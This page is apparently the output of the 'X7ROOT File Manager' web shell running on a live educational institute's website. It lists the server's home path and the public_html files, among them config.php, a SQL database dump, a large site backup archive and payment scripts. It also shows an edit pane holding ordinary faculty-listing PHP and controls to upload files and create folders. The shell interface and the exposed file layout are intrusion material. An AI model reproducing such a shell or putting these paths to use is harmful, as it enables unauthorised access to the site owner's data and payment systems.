X7ROOT File Manager
Current Path:
/home/u126090504/domains/kiitacademy.in/public_html
home
/
u126090504
/
domains
/
kiitacademy.in
/
public_html
/
📄
+2-Arts&Commerce.php
(6.81 KB)
📁
..
📄
.htaccess
(1.12 KB)
📄
about-us.php
(9.37 KB)
📄
achievers.php
(3.36 KB)
📁
admin
📄
admission.php
(4.92 KB)
📄
admission_submit.php
(1.48 KB)
📄
album.php
(890 B)
📄
cleanup_README.txt
(1.25 KB)
📄
computer-courses.php
(22.83 KB)
📄
config.php
(1.21 KB)
📄
contact-us.php
(8.19 KB)
📄
contactdb.php
(796 B)
📁
css
📄
director's-message.php
(4.53 KB)
📄
downloads.php
(3.14 KB)
📄
error.log
(13.82 KB)
📄
facilities.php
(13.29 KB)
📄
faculty.php
(3.56 KB)
📁
fonts
📄
footer.php
(5.7 KB)
📄
franchise.php
(2.09 KB)
📄
gallery.php
(3.32 KB)
📄
header.php
(11.92 KB)
📁
images
📄
index.php
(39.44 KB)
📁
js
📁
kiit
📄
kiit-backup.zip
(85.95 MB)
📁
lib
📄
media.php
(2.76 KB)
📄
payment.php
(8.88 KB)
📄
payment_submit.php
(10.97 KB)
📄
payment_verify.php
(2.31 KB)
📁
qrcodes
📁
revolution
📄
search_videos.php
(1.76 KB)
📄
secure_upload.php
(2.87 KB)
📄
showpath.php
(107 B)
📄
u721653068_kiitinst25.sql
(17.4 KB)
📁
uploads
📄
videos.php
(4.38 KB)
Editing: faculty.php
<?php require_once 'config.php'; include 'header.php'; ?> <!-- page-title --> <div class="ttm-page-title-row"> <div class="ttm-page-title-row-inner ttm-textcolor-white"> <div class="container"> <div class="row align-items-center"> <div class="col-lg-12"> <div class="page-title-heading"> <h2 class="title">Faculty</h2> </div> <div class="breadcrumb-wrapper"> <span> <a title="Homepage" href="index.php">Home</a> </span> <span class="ttm-bread-sep"> > </span> <span class="current">Faculty</span> </div> </div> </div> </div> </div> </div><!-- page-title end--> <!--site-main start--> <div class="site-main"> <!--grid-section--> <section class="ttm-row grid-section clearfix"> <div class="container"> <div class="row"> <?php // ✅ Faculty fetch from DB $stmt = $conn->prepare("SELECT name, designation, qualification, experience, photo FROM faculty ORDER BY id DESC"); $stmt->execute(); $res = $stmt->get_result(); if ($res->num_rows > 0) { while ($row = $res->fetch_assoc()) { $name = htmlspecialchars($row['name']); $des = htmlspecialchars($row['designation']); $qual = htmlspecialchars($row['qualification']); $exp = htmlspecialchars($row['experience']); $photo = !empty($row['photo']) ? "uploads/faculty/" . htmlspecialchars($row['photo']) : "images/default-user.png"; ?> <div class="ttm-box-col-wrapper col-lg-3 col-md-3 col-sm-6"> <!-- featured-imagebox-team --> <div class="featured-imagebox featured-imagebox-team"> <div class="ttm-team-box-view-overlay"> <div class="featured-thumbnail"> <img class="img-fluid" src="<?php echo $photo; ?>" alt="<?php echo $name; ?>"> </div> </div> <div class="featured-content featured-content-team"> <div class="featured-title"> <h5><?php echo $name; ?></h5> </div> <div class="team-position"><?php echo $des; ?></div> <div class="team-position"><?php echo $qual; ?></div> <div class="team-position"><?php echo $exp; ?> Years Experience</div> </div> </div><!-- featured-imagebox-team end--> </div> <?php } } else { echo "<p>No Faculty Records Found</p>"; } ?> </div><!-- row end --> </div> </section> <!--grid-section end--> </div><!--site-main end--> <!--footer start--> <?php include("footer.php"); ?> <!--footer end-->
Upload File
Create Folder